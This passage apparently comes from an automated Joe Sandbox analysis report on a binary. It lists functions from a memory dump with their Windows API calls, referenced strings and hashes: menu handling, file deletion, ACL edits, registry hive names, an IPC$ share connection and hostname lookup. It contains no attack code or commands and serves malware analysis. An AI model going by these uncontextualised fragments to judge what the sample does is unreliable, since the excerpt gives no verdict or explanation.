OleLoadPicture.OLEAUT32(?,00000000,00000000,00293C7C,?), ref: 0028C149
GlobalFree.KERNEL32(00000000), ref: 0028C159
GetObjectW.GDI32(00000000,00000018,?), ref: 0028C17D
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0028C1A8
DeleteObject.GDI32(00000000), ref: 0028C1D0
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0028C1E6

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 9e3c28b0c9407ce4076e4b626ed8bc43396243b7e62085338c8db0b91f1d2991
Instruction ID: 248ab96e592c6a6d3e4170c3f6bba37aebab5fae62b1636727907694e5433785
Opcode Fuzzy Hash: 9e3c28b0c9407ce4076e4b626ed8bc43396243b7e62085338c8db0b91f1d2991
Instruction Fuzzy Hash: 33416B75601209EFCB219F64EC8CEAE7BB8EF89711F104059F90AE72A0C731AD40DB60

Function 0026DEDC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0026E053
_wcscat.LIBCMT ref: 0026E06B
_wcscat.LIBCMT ref: 0026E07D
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0026E092
SetCurrentDirectoryW.KERNEL32(?), ref: 0026E0A6
GetFileAttributesW.KERNEL32(?), ref: 0026E0BE
SetFileAttributesW.KERNEL32(?,00000000), ref: 0026E0D8
SetCurrentDirectoryW.KERNEL32(?), ref: 0026E0EA

Strings

*.*, xrefs: 0026E129

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: ca5a7b53eb220f65202b04b3f25083077690f624788d4649fb14d53a8b8c879f
Instruction ID: 0115f583a89c18762445ffb26fcb4fefbcfe0f786884c38a333af436d2364540
Opcode Fuzzy Hash: ca5a7b53eb220f65202b04b3f25083077690f624788d4649fb14d53a8b8c879f
Instruction Fuzzy Hash: 82819371A243469FCB20EF64C84496AB7E4EF99310F148C2EF88AC7651E770DDA4CB52

Function 0028C854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002029E2: GetWindowLongW.USER32(?,000000EB), ref: 002029F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0028C8A4
GetFocus.USER32 ref: 0028C8B4
GetDlgCtrlID.USER32(00000000), ref: 0028C8BF
_memset.LIBCMT ref: 0028C9EA
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0028CA15
GetMenuItemCount.USER32(?), ref: 0028CA35
GetMenuItemID.USER32(?,00000000), ref: 0028CA48
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0028CA7C
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0028CAC4
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0028CAFC
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0028CB31

Strings

0, xrefs: 0028C9E2

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 9ac104c31b2e296ea6cacc581e8ccd0370a8f479a8b233405089a4dfdfed608a
Instruction ID: cd6f130d33bef8b6e2add081747a5a7fccac5a095f28d6e9ac798e94dace30ef
Opcode Fuzzy Hash: 9ac104c31b2e296ea6cacc581e8ccd0370a8f479a8b233405089a4dfdfed608a
Instruction Fuzzy Hash: 21818D75219306AFD714EF14D889E6ABBE8FF88314F20451EF99593291C730D925CFA2

Function 00258ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00258E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00258E3C
Part of subcall function 00258E20: GetLastError.KERNEL32(?,00258900,?,?,?), ref: 00258E46
Part of subcall function 00258E20: GetProcessHeap.KERNEL32(00000008,?,?,00258900,?,?,?), ref: 00258E55
Part of subcall function 00258E20: HeapAlloc.KERNEL32(00000000,?,00258900,?,?,?), ref: 00258E5C
Part of subcall function 00258E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00258E73

Part of subcall function 00258EBD: GetProcessHeap.KERNEL32(00000008,00258916,00000000,00000000,?,00258916,?), ref: 00258EC9
Part of subcall function 00258EBD: HeapAlloc.KERNEL32(00000000,?,00258916,?), ref: 00258ED0
Part of subcall function 00258EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00258916,?), ref: 00258EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00258B2E
_memset.LIBCMT ref: 00258B43
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00258B62
GetLengthSid.ADVAPI32(?), ref: 00258B73
GetAce.ADVAPI32(?,00000000,?), ref: 00258BB0
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00258BCC
GetLengthSid.ADVAPI32(?), ref: 00258BE9
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00258BF8
HeapAlloc.KERNEL32(00000000), ref: 00258BFF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00258C20
CopySid.ADVAPI32(00000000), ref: 00258C27
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00258C58
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00258C7E
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00258C92

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 20e3ff5ce8f33547ed24be49bec8aa032c0050907288d530e2c664f4823c876b
Instruction ID: 97b419881043a693bfa272b63584d2e8da336e61d8bd3a9b5e2602e92943497a
Opcode Fuzzy Hash: 20e3ff5ce8f33547ed24be49bec8aa032c0050907288d530e2c664f4823c876b
Instruction Fuzzy Hash: C3616E7191020AAFCF14DFA0DC85EAEBB79FF05301F04815AF915A6290DB759A14CF64

Function 00277A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00277A79
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00277A85
CreateCompatibleDC.GDI32(?), ref: 00277A91
SelectObject.GDI32(00000000,?), ref: 00277A9E
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00277AF2
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00277B2E
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00277B52
SelectObject.GDI32(00000006,?), ref: 00277B5A
DeleteObject.GDI32(?), ref: 00277B63
DeleteDC.GDI32(00000006), ref: 00277B6A
ReleaseDC.USER32(00000000,?), ref: 00277B75

Strings

(, xrefs: 00277AFA

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 0a5ee857b62e16e4dfe7e571564efd5947fa8011ce9a350abe633a0ba93cb255
Instruction ID: 73ce43568fbc04f81f12024e1de7f0943ec4b334ffb6cdf231f35a58f2b81338
Opcode Fuzzy Hash: 0a5ee857b62e16e4dfe7e571564efd5947fa8011ce9a350abe633a0ba93cb255
Instruction Fuzzy Hash: 77514C71914309EFDB14CFA8DC89EAEBBB9EF48310F14841EF949A7210D731A951CB60

Function 0026A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0026A4D4

Part of subcall function 00211A36: _memmove.LIBCMT ref: 00211A77

LoadStringW.USER32(?,?,00000FFF,?), ref: 0026A4F6
__swprintf.LIBCMT ref: 0026A54F
__swprintf.LIBCMT ref: 0026A568
_wprintf.LIBCMT ref: 0026A61E
_wprintf.LIBCMT ref: 0026A63C

Strings

Error: , xrefs: 0026A5E6
^ ERROR, xrefs: 0026A5C0
"%s" (%d) : ==> %s:, xrefs: 0026A637
Line %d (File "%s"):, xrefs: 0026A549, 0026A562
"%s" (%d) : ==> %s:%s%s, xrefs: 0026A619

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 015a832eac41a31e38be1d725c3503d894e21ff97c86c57b1c8da2b0c6981e7a
Instruction ID: 433c67284579fce7cce390bc99e9e28d177d4bcf28085a5a8dcd1e2c52434f0e
Opcode Fuzzy Hash: 015a832eac41a31e38be1d725c3503d894e21ff97c86c57b1c8da2b0c6981e7a
Instruction Fuzzy Hash: 9D518F71820119AACF15EBE0DD86EEEB7B9AF14340F104165F605B20A1DB316FB8DF51

Function 00269710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0026951A: __time64.LIBCMT ref: 00269524

Part of subcall function 00214A8C: _fseek.LIBCMT ref: 00214AA4

__wsplitpath.LIBCMT ref: 002697EF

Part of subcall function 0022431E: __wsplitpath_helper.LIBCMT ref: 0022435E

_wcscpy.LIBCMT ref: 00269802
_wcscat.LIBCMT ref: 00269815
__wsplitpath.LIBCMT ref: 0026983A
_wcscat.LIBCMT ref: 00269850
_wcscat.LIBCMT ref: 00269863

Part of subcall function 00269560: _memmove.LIBCMT ref: 00269599
Part of subcall function 00269560: _memmove.LIBCMT ref: 002695A8

_wcscmp.LIBCMT ref: 002697AA

Part of subcall function 00269CF1: _wcscmp.LIBCMT ref: 00269DE1
Part of subcall function 00269CF1: _wcscmp.LIBCMT ref: 00269DF4

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00269A0D
_wcsncpy.LIBCMT ref: 00269A80
DeleteFileW.KERNEL32(?,?), ref: 00269AB6
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00269ACC
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00269ADD
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00269AEF

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: ac6497fa94151aaf320692d07e4d2a3c5c145807b2a6ef89d2b1d73a7705515b
Instruction ID: d9f71d2282d92d740d63d3f4f2618eaa72e4648ce1cd324b47d783361888fa71
Opcode Fuzzy Hash: ac6497fa94151aaf320692d07e4d2a3c5c145807b2a6ef89d2b1d73a7705515b
Instruction Fuzzy Hash: A8C15BB1D10229AADF21DF95CC85ADEB7BDEF58300F0040AAF609E7151EB709AD48F65

Function 00215BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00215BF1
GetMenuItemCount.USER32(002C7890), ref: 00250E7B
GetMenuItemCount.USER32(002C7890), ref: 00250F2B
GetCursorPos.USER32(?), ref: 00250F6F
SetForegroundWindow.USER32(00000000), ref: 00250F78
TrackPopupMenuEx.USER32(002C7890,00000000,?,00000000,00000000,00000000), ref: 00250F8B
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00250F97

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: a6816ad9385bfb97a73a3e2fd5ba222122c5f2ec66fc87fc116bcd34a55c29be
Instruction ID: 6b23f60d28c32f1361f64df88b4a863cef5f37daeb65cac3cbea21162e34deed
Opcode Fuzzy Hash: a6816ad9385bfb97a73a3e2fd5ba222122c5f2ec66fc87fc116bcd34a55c29be
Instruction Fuzzy Hash: AE71E03062561ABFEB209F54DCCAFAABFA4FF44764F200216F914661D0C7B168B4DB94

Function 0026AEEA Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00290980), ref: 0026AF4E
GetDriveTypeW.KERNEL32(00000061,002BB5F0,00000061), ref: 0026B018
_wcscpy.LIBCMT ref: 0026B042

Strings

network, xrefs: 0026AFAC
fixed, xrefs: 0026AF96
ramdisk, xrefs: 0026AFC2
L,), xrefs: 0026B03A
unknown, xrefs: 0026AFD9
removable, xrefs: 0026AF80
all, xrefs: 0026AF54
cdrom, xrefs: 0026AF6A

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: L,)$all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-2343273750
Opcode ID: 37fd036b55ed2a9557fbea42650dc638db365da0d6e3e48393aab5a0b9f10365
Instruction ID: 0ebed8527ce2e07084b635ff512aa745cb492d59e1b724a69198fb1fa0610a57
Opcode Fuzzy Hash: 37fd036b55ed2a9557fbea42650dc638db365da0d6e3e48393aab5a0b9f10365
Instruction Fuzzy Hash: 5C51DD70138305AFC311EF14D891AAAB7A4EF94340F50881DF595972E2DB71ADA9CF53

Function 002583FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00211821: _memmove.LIBCMT ref: 0021185B

_memset.LIBCMT ref: 00258489
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002584BE
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002584DA
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002584F6
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00258520
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00258548
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00258553
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00258558

Strings

SOFTWARE\Classes\, xrefs: 0025842A
\CLSID, xrefs: 00258440
\IPC$, xrefs: 002584A0

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: db911ca8eca5f8f08ccf86a18a91c866bd847f8089116d67861d89064cd1dc2e
Instruction ID: d6fc85f58a3e07cb48c15abcc55ac12bfdd212077df2f36a5cbc34e28dc4a304
Opcode Fuzzy Hash: db911ca8eca5f8f08ccf86a18a91c866bd847f8089116d67861d89064cd1dc2e
Instruction Fuzzy Hash: 2541E572C2022DABCB21EFA4DC95DEDB7B8BF14341B44416AE915B2161EA709E64CF90

Function 0028147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0028040D,?,?), ref: 00281491

Strings

HKEY_CURRENT_USER, xrefs: 00281570
HKEY_LOCAL_MACHINE, xrefs: 002814FA
HKCC, xrefs: 0028155F
HKCU, xrefs: 00281581
HKEY_CLASSES_ROOT, xrefs: 00281524
HKEY_USERS, xrefs: 00281592
HKCR, xrefs: 00281539
HKU, xrefs: 002815A3
HKEY_CURRENT_CONFIG, xrefs: 0028154E
HKLM, xrefs: 0028150F

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: c2c1599b804c76305062a2e5e5f02501fd0e219f89fdb9eca4fb3ff3365fe38f
Instruction ID: c5b1494dab7e6c98537e37e8a28712bed610c8c6ade86e6f0695d774fe2055ba
Opcode Fuzzy Hash: c2c1599b804c76305062a2e5e5f02501fd0e219f89fdb9eca4fb3ff3365fe38f
Instruction Fuzzy Hash: 0E414C7453226A9BDF00FF94E880AEA3768EF55340FA04415FC52572E2DB74AD7ACB60

Function 00265882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00211821: _memmove.LIBCMT ref: 0021185B

Part of subcall function 0021153B: _memmove.LIBCMT ref: 002115C4

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002658EB
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00265901
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00265912
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00265924
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00265935

Strings

open , xrefs: 0026589A
close PlayMe, xrefs: 002658FC, 00265929
alias PlayMe, xrefs: 002658C4
play PlayMe, xrefs: 00265930
status PlayMe mode, xrefs: 002658E6
play PlayMe wait, xrefs: 0026591F

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 24429b2db94cafc87508614b97e1c32b7a89fa47b15be53935a574f734f34df3
Instruction ID: 0f28d110378f2db73e1c4f4ba7025ae90b8df1a9759ea50fd7856fdfd9d590d1
Opcode Fuzzy Hash: 24429b2db94cafc87508614b97e1c32b7a89fa47b15be53935a574f734f34df3
Instruction Fuzzy Hash: 4B11B631970169B9D720A7A1DC5ADFF6BBCEBA2B90F4404697511930D0DAF01DB4C9E0

Function 00264C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00264C27
gethostname.WSOCK32(?,00000100), ref: 00264C41
gethostbyname.WSOCK32(?), ref: 00264C4E
_wcscpy.LIBCMT ref: 00264C76
_memmove.LIBCMT ref: 00264C89
inet_ntoa.WSOCK32(?), ref: 00264C94
_strcat.LIBCMT ref: 00264CA2
_wcscpy.LIBCMT ref: 00264CB9
WSACleanup.WSOCK32 ref: 00264CC7
_wcscpy.LIBCMT ref: 00264CD5

Strings

0.0.0.0, xrefs: 00264C70

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: d541a66b30763b8ab3eb3565a9963f61285136504a8c33606025dfbc12058bf6
Instruction ID: 56aab5e5fd26b4a77b4d633c3ed6da881b7d8c7a2c641d3782795a49e96e4131
Opcode Fuzzy Hash: d541a66b30763b8ab3eb3565a9963f61285136504a8c33606025dfbc12058bf6
Instruction Fuzzy Hash: FC113A32524119FFCB11BBA0AD8AEDA77BCDF41710F0401A7F44896191EF709EE18E50

Function 00265530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00265535

Part of subcall function 00220859: timeGetTime.WINMM(?,00000002,0020C22C), ref: 0022085D

Sleep.KERNEL32(0000000A), ref: 00265561
EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00265585
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 002655A7
SetActiveWindow.USER32 ref: 002655C6
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002655D4
SendMessageW.USER32(00000010,00000000,00000000), ref: 002655F3
Sleep.KERNEL32(000000FA), ref: 002655FE
IsWindow.USER32 ref: 0026560A
EndDialog.USER32(00000000), ref: 0026561B

Strings

BUTTON, xrefs: 00265599

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

